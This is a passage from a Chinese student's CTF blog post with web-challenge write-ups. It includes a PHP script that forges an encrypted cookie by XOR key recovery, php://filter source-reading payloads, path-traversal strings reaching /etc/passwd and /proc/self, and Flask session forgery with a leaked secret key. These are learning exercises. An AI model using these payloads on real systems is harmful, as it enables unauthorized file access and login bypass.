<!DOCTYPE HTML>
<html lang="en">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="buu-week1, 黛色若梦">
    <meta name="description" content="A Freshman">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>buu-week1 | 黛色若梦</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="黛色若梦" type="application/atom+xml">
</head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">黛色若梦</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>Index</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>Tags</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>Categories</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>Archives</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>About</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>Contact</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>Friends</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="Search" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">黛色若梦</div>
        <div class="logo-desc">
            
            A Freshman
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			Index
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			Tags
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			Categories
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			Archives
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			About
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			Contact
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			Friends
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/22.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">buu-week1</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/ctf%E9%A2%98%E7%9B%AE-web/">
                                <span class="chip bg-color">ctf题目--web</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>Publish Date:&nbsp;&nbsp;
                    2022-02-13
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <img src="/images/1.7.png" alt="1.7" style="zoom:25%;" />

<h4 id="1-“百度杯”CTF比赛-九月场–code"><a href="#1-“百度杯”CTF比赛-九月场–code" class="headerlink" title="1.“百度杯”CTF比赛 九月场–code"></a>1.“百度杯”CTF比赛 九月场–code</h4><p>收获：1.看到url里面有文件包含的要注意，这里遇到一个新知识点，讲解一下，了解一下<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_43625917/article/details/102617154">文件读取</a>。</p>
<p>2.phpstorm创建的文件会自动创建一个idea，里面的workspace.xml会保存目录结构。</p>
<p>3.这种图片的题目，想考虑一下文件上传和读取。</p>
<p>过程：先考虑一下扫目录，bp,view-source,控制台,啥提示都木有，返回到提示：code，是经过编码了吗？</p>
<p>然后我们注意看一下url，感觉有点像之前做文件上传靶场中的读取，当时我们是读取木马文件，我们现在看看能不能读取其他文件。</p>
<p>flag.php，index.php比较常用。</p>
<p>index.php源码里base64加密，解密一下。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">/**</span><br><span class="line"> * Created by PhpStorm.</span><br><span class="line"> * Date: 2015/11/16</span><br><span class="line"> * Time: 1:31</span><br><span class="line"> */</span><br><span class="line">header(&#x27;content-type:text/html;charset=utf-8&#x27;);</span><br><span class="line">if(! isset($_GET[&#x27;jpg&#x27;]))</span><br><span class="line">    header(&#x27;Refresh:0;url=./index.php?jpg=hei.jpg&#x27;);</span><br><span class="line">$file = $_GET[&#x27;jpg&#x27;];</span><br><span class="line">echo &#x27;&lt;title&gt;file:&#x27;.$file.&#x27;&lt;/title&gt;&#x27;;</span><br><span class="line">$file = preg_replace(&quot;/[^a-zA-Z0-9.]+/&quot;,&quot;&quot;, $file);</span><br><span class="line">$file = str_replace(&quot;config&quot;,&quot;_&quot;, $file);</span><br><span class="line">$txt = base64_encode(file_get_contents($file));</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">/*str_replace() 函数以其他字符替换字符串中的一些字符（区分大小写）。</span><br><span class="line"></span><br><span class="line">该函数必须遵循下列规则：</span><br><span class="line"></span><br><span class="line">如果搜索的字符串是数组，那么它将返回数组。</span><br><span class="line"></span><br><span class="line">如果搜索的字符串是数组，那么它将对数组中的每个元素进行查找和替换。</span><br><span class="line"></span><br><span class="line">如果同时需要对数组进行查找和替换，并且需要执行替换的元素少于查找到的元素的数量，那么多余元素将用空字符串进行替换</span><br><span class="line"></span><br><span class="line">如果查找的是数组，而替换的是字符串，那么替代字符串将对所有查找到的值起作用。</span><br><span class="line">preg_replace():</span><br><span class="line"></span><br><span class="line">preg_replace （）用于执行一个正则表达式的搜索和替换，一般很少使用。</span><br><span class="line"></span><br><span class="line">echo preg_replace(&quot;/[0-9]/&quot;,&quot;&quot;,$str);//去掉所有数字 echo preg_replace(&quot;/[a-z]/&quot;,&quot;&quot;,$str); //这样是去掉所有小写字母 echo preg_replace(&quot;/[A-Z]/&quot;,&quot;&quot;,$str); //这样是去掉所有大写字母 echo preg_replace(&quot;/[a-z,A-Z]/&quot;,&quot;&quot;,$str); //这样是去掉所有字母</span><br><span class="line"></span><br><span class="line">strtr():</span><br><span class="line"></span><br><span class="line">strtr() 函数转换字符串中特定的字符。</span><br><span class="line"></span><br><span class="line">注释：如果 from 和 to 参数的长度不同，则会被格式化为最短的长度。</span><br><span class="line">参考博客：https://blog.csdn.net/star_xing123/article/details/101272892</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">/*</span><br><span class="line"> * Can you find the flag file?</span><br><span class="line"> *</span><br><span class="line"> */</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>一个点是注释中phpstorm，另一个是过滤与正则，</p>
<p>phpstorm创建的文件会自动创建一个idea，里面的workspace.xml会保存目录结构。访问一下</p>
<p><a target="_blank" rel="noopener" href="http://eci-2zehj54thxnvf77ueage.cloudeci1.ichunqiu.com/.idea/workspace.xml">http://eci-2zehj54thxnvf77ueage.cloudeci1.ichunqiu.com/.idea/workspace.xml</a></p>
<p>出现list选项，<list></p>
<option value="$PROJECT_DIR$/x.php"/>
<option value="$PROJECT_DIR$/config.php"/>
<option value="$PROJECT_DIR$/fl3g_ichuqiu.php"/>
</list>

<p>所以我们访问fl3g_ichuqiu.php,正则里告诉我们我们要构造fl3gconfigichuqiu.php</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">/**</span><br><span class="line"> * Created by PhpStorm.</span><br><span class="line"> * Date: 2015/11/16</span><br><span class="line"> * Time: 1:31</span><br><span class="line"> */</span><br><span class="line">error_reporting(E_ALL || ~E_NOTICE);</span><br><span class="line">include(&#x27;config.php&#x27;);</span><br><span class="line">function random($length, $chars = &#x27;ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz&#x27;) &#123;</span><br><span class="line">    $hash = &#x27;&#x27;;</span><br><span class="line">    $max = strlen($chars) - 1;</span><br><span class="line">    for($i = 0; $i &lt; $length; $i++)	&#123;</span><br><span class="line">        $hash .= $chars[mt_rand(0, $max)];</span><br><span class="line">    &#125;</span><br><span class="line">    return $hash;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function encrypt($txt,$key)&#123;</span><br><span class="line">    for($i=0;$i&lt;strlen($txt);$i++)&#123;</span><br><span class="line">        $tmp .= chr(ord($txt[$i])+10);</span><br><span class="line">    &#125;</span><br><span class="line">    $txt = $tmp;</span><br><span class="line">    $rnd=random(4);</span><br><span class="line">    $key=md5($rnd.$key);</span><br><span class="line">    $s=0;</span><br><span class="line">    for($i=0;$i&lt;strlen($txt);$i++)&#123;</span><br><span class="line">        if($s == 32) $s = 0;</span><br><span class="line">        $ttmp .= $txt[$i] ^ $key[++$s];</span><br><span class="line">    &#125;</span><br><span class="line">    return base64_encode($rnd.$ttmp);</span><br><span class="line">&#125;</span><br><span class="line">function decrypt($txt,$key)&#123;</span><br><span class="line">    $txt=base64_decode($txt);</span><br><span class="line">    $rnd = substr($txt,0,4);</span><br><span class="line">    $txt = substr($txt,4);//从第四个以后开始的内容赋值给txt</span><br><span class="line">    $key=md5($rnd.$key);</span><br><span class="line"></span><br><span class="line">    $s=0;</span><br><span class="line">    for($i=0;$i&lt;strlen($txt);$i++)&#123;</span><br><span class="line">        if($s == 32)</span><br><span class="line">        $s = 0;</span><br><span class="line">        $tmp .= $txt[$i]^$key[++$s];</span><br><span class="line">    &#125;</span><br><span class="line">    //这里是a、b两个值不相同，则异或结果为1，^要看清楚位置，可能性还蛮多的</span><br><span class="line">    a=a&#x27;b+ab&#x27;</span><br><span class="line">    </span><br><span class="line">    for($i=0;$i&lt;strlen($tmp);$i++)&#123;</span><br><span class="line">        $tmp1 .= chr(ord($tmp[$i])-10);//将tmp变量的每个字节转化为ascii，-10，再转为字符然后拼接，赋值给变量tmp1 </span><br><span class="line">最终返回tmp1 </span><br><span class="line">    &#125;</span><br><span class="line">    return $tmp1;</span><br><span class="line">&#125;</span><br><span class="line">$username = decrypt($_COOKIE[&#x27;user&#x27;],$key);</span><br><span class="line">if ($username == &#x27;system&#x27;)&#123;</span><br><span class="line">    echo $flag;</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    setcookie(&#x27;user&#x27;,encrypt(&#x27;guest&#x27;,$key));</span><br><span class="line">    echo &quot;╮(╯▽╰)╭&quot;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>代码审计一般我们要从flag逆向思维回去抓重点。</p>
<p>1.if ($username == ‘system’){  echo $flag;</p>
<p>2.$username = decrypt($_COOKIE[‘user’],$key);  </p>
<p>  对（）内进行函数作用，这是一个自定义函数，作用还要往上看，</p>
<p>3.所以我们要怎么构造呢？</p>
<p>从decrypt函数出发：</p>
<p>想要推出$txt，我们就可以异或，让$tmp ^$key。不过$key这里我们要注意一下。这里的$key如果我们不进行一些处理的话，并不是我们之前得到的那个$key的那五位。怎么让他们一样呢？我们让传入的user经过base解码后的前四位和S3AwRRVJXRtJ经过base64解码后的前四位一样。因为在函数里面，最开始传入的$key都是一样的：</p>
<p>这点一定要注意，我的意思是decrypt和encrypt这两个函数，传入的两个参数txt和key，其中key这个值可能是在config.php里面，我们经过多次请求，其实并不会改变config.php里面的key，这样真正传入的key并不会因为我们的请求而发生改变</p>
<p>这样经过$key=md5($rnd.$key);之后得到的]$key中的那五位和我们之前得到的就是一样的了。不过还有一点，因为$tmp是六位，因此我们要$tmp^$key的话，$key也要是六位，我们已经得到了前五位，只需要对第六位进行爆破即可。爆破的范围是1-9a-f,因为md5最终返回的数值是16进制对应的字符是0<del>9 a</del>f<br>这样经过异或得到的$txt前面再加上S3AwRRVJXRtJ经过base64解码后的前四位，再经过base64编码，得到的就是我们要构造的user了。</p>
<p>原文链接：<a target="_blank" rel="noopener" href="https://blog.csdn.net/rfrder/article/details/108542365">https://blog.csdn.net/rfrder/article/details/108542365</a></p>
<p>根据代码的最后一段：当cookie中user的值解密后不为system时，会给我们guest加密后的值，这就提醒我们key的前五位可以通过guest得知</p>
<p>给一下大佬的wp</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    $txt1 = &#x27;guest&#x27;;</span><br><span class="line">    for ($i = 0; $i &lt; strlen($txt1); $i++) &#123;</span><br><span class="line">        $txt1[$i] = chr(ord($txt1[$i])+10);</span><br><span class="line">    &#125;</span><br><span class="line">    $cookie_guest = &#x27;bnBwcEgbXERG&#x27;; </span><br><span class="line">    $cookie_guest = base64_decode($cookie_guest);</span><br><span class="line">    $rnd = substr($cookie_guest,0,4); </span><br><span class="line">    $ttmp = substr($cookie_guest,4);</span><br><span class="line">    $key=&#x27;&#x27;;</span><br><span class="line">    for ($i = 0; $i &lt; strlen($txt1); $i++) &#123;</span><br><span class="line">        $key .= ($txt1[$i] ^ $ttmp[$i]);//$key=md5($rnd.$key);</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    $txt2 = &#x27;system&#x27;;</span><br><span class="line">    for ($i = 0; $i &lt; strlen($txt2); $i++) &#123;</span><br><span class="line">        $txt2[$i] = chr(ord($txt2[$i])+10);</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    $md5 = &#x27;0123456789abcdef&#x27;;</span><br><span class="line">    for ($i = 0; $i &lt; strlen($md5); $i++) &#123;</span><br><span class="line">        $key_new = $key.$md5[$i];</span><br><span class="line">        $cookie_system=&#x27;&#x27;;</span><br><span class="line">        for ($j = 0; $j &lt; strlen($txt2); $j++) &#123;</span><br><span class="line">            $cookie_system .= ($key_new[$j] ^ $txt2[$j]);</span><br><span class="line">        &#125;</span><br><span class="line">        $cookie_system = base64_encode($rnd.$cookie_system);</span><br><span class="line">        echo $cookie_system.&quot;&lt;/br&gt;&quot;;</span><br><span class="line">    &#125;  </span><br><span class="line">?&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>带进去爆破就可以得到user，带进去就好了。</p>
<h4 id="2-N1BOOK–web入门-afr-1"><a href="#2-N1BOOK–web入门-afr-1" class="headerlink" title="2.N1BOOK–web入门 afr_1"></a>2.N1BOOK–web入门 afr_1</h4><h5 id="概念："><a href="#概念：" class="headerlink" title="概念："></a>概念：</h5><p>文件读取漏洞（文件包含漏洞常常会导致任意文件读取与任意命令执行）</p>
<p>PHP向用户提供的指定待打开文件的方式，是一个文件流  PHP的Filter机制，可对目前的协议进行一定的处理，比如将当前文件流的内容进行Base64编码。使用方法php://filter/read=convert.base64-encode/resource=xxx  利用Filter机制，构造形如以上的攻击数据可以读取文件，拿到各种文件的源码。</p>
<p>这种题目之前有遇到过了，但是方法都差不多，伪协议的还可以用php://input来读取，毕竟现在自己的水平还太菜，做的 题目比较基础。。慢慢来吧。</p>
<h5 id="解题"><a href="#解题" class="headerlink" title="解题"></a>解题</h5><p>参数p=hello根据经验猜测为文件包含点，包含的参数后应该拼接了.php<br>所以一开始输入了flag，但显示nonono，然后我们尝试用filter读取。</p>
<p>输入?p=php://filter/convert.base64-encode/resource=flag</p>
<p>编码后不会被执行所以可以以编码形式显示源码，再解码即可得到flag了。</p>
<h4 id="3-afr-2"><a href="#3-afr-2" class="headerlink" title="3.afr_2"></a>3.afr_2</h4><h5 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h5><p>Nginx错误配置可能产生目录穿越漏洞，比如：</p>
<p>location /static {<br>    alias /home/myapp/static/;<br>}</p>
<p>  由于static后没有加/，如果用户请求/static…/，拼接到alias进会变成/home/myapp/static/…/会穿越到myapp目录</p>
<h5 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h5><p>我们发现：</p>
<p><img src="/images/2-16447453664001.png" alt="2"></p>
<p><img src="/images/2.2-16447453769312.png" alt="2.2"></p>
<p>其实是被解析成/image/../</p>
<p>然后就可以进入目录下的flag，下载后就可以打开了。</p>
<h4 id="4-afr-3"><a href="#4-afr-3" class="headerlink" title="4.afr_3"></a>4.afr_3</h4><h5 id="概念：-1"><a href="#概念：-1" class="headerlink" title="概念："></a>概念：</h5><p>目录穿越漏洞</p>
<p>目录穿越不仅可以访问服务器中的任何目录，还可以访问服务器中任何文件的内容。例如，攻击者通过浏览器访问../../../../../../../../../../../../../../etc/passwd（此处较多../），就可以读取Linux服务器根目录下的etc目录下的passwd文件的内容。</p>
<p>目录穿越比目录浏览、目录遍历更具破坏性，目录穿越不仅可以读取服务器中任何目录及任何文件的内容，还可以执行系统命令。</p>
<p>本题考查对linux系统中/proc/目录下文件作用的了解，同时考查了<a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=flask&spm=1001.2101.3001.7020">flask</a>模板注入<br>关于/proc/目录<br>Linux系统上的/proc目录是一种文件系统，即proc文件系统。与其它常见的文件系统不同的是，/proc是一种伪文件系统（也即虚拟文件系统），存储的是当前内核运行状态的一系列特殊文件，用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息，甚至可以通过更改其中某些文件来改变内核的运行状态。<br>/proc/[pid],当查看当前进程的时候可以用/proc/self代替<br>cmdline — 启动当前进程的完整命令，但僵尸进程目录中的此文件不包含任何信息<br>cwd — 指向当前进程运行目录的一个符号链接<br>environ — 当前进程的环境变量列表，彼此间用空字符（NULL）隔开；变量用大写字母表示，其值用小写字母表示</p>
<h5 id="解题-1"><a href="#解题-1" class="headerlink" title="解题"></a>解题</h5><p>随便试试发现name这里可能会存在URLget方式提交一些什么，然后出现路径穿越或文件包含漏洞</p>
<p>而通过输入name=index发现</p>
<p><img src="/images/3-16447463207233.png" alt="3"></p>
<p>我们猜想属于目录穿越漏洞：../回到上级目录，回到前五级再回来。</p>
<p>name=…/…/…/…/…/proc/self/cmdline</p>
<p>name=../../../../../proc/self/cwd/server.py</p>
<p><img src="/images/3.2.png" alt="3.2"></p>
<p>分析一下：</p>
<p>if “n1code” not in session or session[‘n1code’] is None: session[‘n1code’] = n1code<br>template = None<br>if session[‘n1code’] is not None:<br> template = ‘’’<h1>N1 Page</h1> &lt;div class=”row&gt; <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don’t look at our <a href='/article?name=article'>article</a>? </div>  </div> ‘’’ %<br>session[‘n1code’]<br>session[‘n1code’] = None<br>return render_template_string(template) </p>
<p>可以看到这里存在ssti，可以用flask的session伪造获取flag。</p>
<p>先进入key.py发现</p>
<p>#!/usr/bin/python key = ‘Drmhze6EPcv0fN_81Bj-nA’</p>
<p><img src="/images/3.3.png" alt="3.3"></p>
<p>然后在kali里面下载flask框架来伪装cookie</p>
<p>git clone <a target="_blank" rel="noopener" href="https://github.com/noraj/flask-session-cookie-manager">https://github.com/noraj/flask-session-cookie-manager</a></p>
<p>然后：</p>
<p>cd  </p>
<p>flask-session-cookie-manager</p>
<p>然后：</p>
<p><img src="../images/1-16450320811991.png" alt="1"></p>
<p><img src="/images/3.4.png" alt="3.4"></p>
<p>最后得到cookie是.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.YgkANw.MCPHNS7iLEx2yYAPvPLJJLB7fGM</p>
<ul>
<li><p>这里发送的请求是get请求，没有cookie,我一直无法伪造cookie。</p>
</li>
<li><p>这时候需要回到首页，输入内容,发送post的请求,现在有cookie直接伪造。</p>
<p>然后这里还有一点就是自己要注意是在有输入name的情况下抓包才能回显flag，我一开始直接套那个初始化的没用。</p>
</li>
</ul>
<h4 id="5-HCTF-2018-WarmUp"><a href="#5-HCTF-2018-WarmUp" class="headerlink" title="5.[HCTF 2018]WarmUp"></a>5.[HCTF 2018]WarmUp</h4><p>文件包含漏洞</p>
<p>根据源码的提示我们找到了source.php里面的源码。</p>
<p>源码分析：</p>
